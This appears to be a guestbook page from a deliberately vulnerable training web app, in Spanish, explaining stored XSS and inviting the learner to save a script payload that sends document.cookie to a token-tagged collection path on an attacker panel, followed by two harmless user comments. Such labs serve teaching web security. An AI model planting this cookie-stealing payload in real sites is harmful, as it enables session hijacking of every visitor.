Libro de visitas
XSS almacenado: lo que se guarda acá lo ven todos los que entran. Si el payload se guarda sin sanitizar, ataca a cada visitante.
VULNERABLE: probá guardar <script>new Image().src='/c/TU_TOKEN?c='+document.cookie</script> (tu token está en el panel de atacante).
Comentarios
- Marto: Alguien sabe si se pueden compartir notas?
- Luciana: Buenisima la app para organizar mis notas!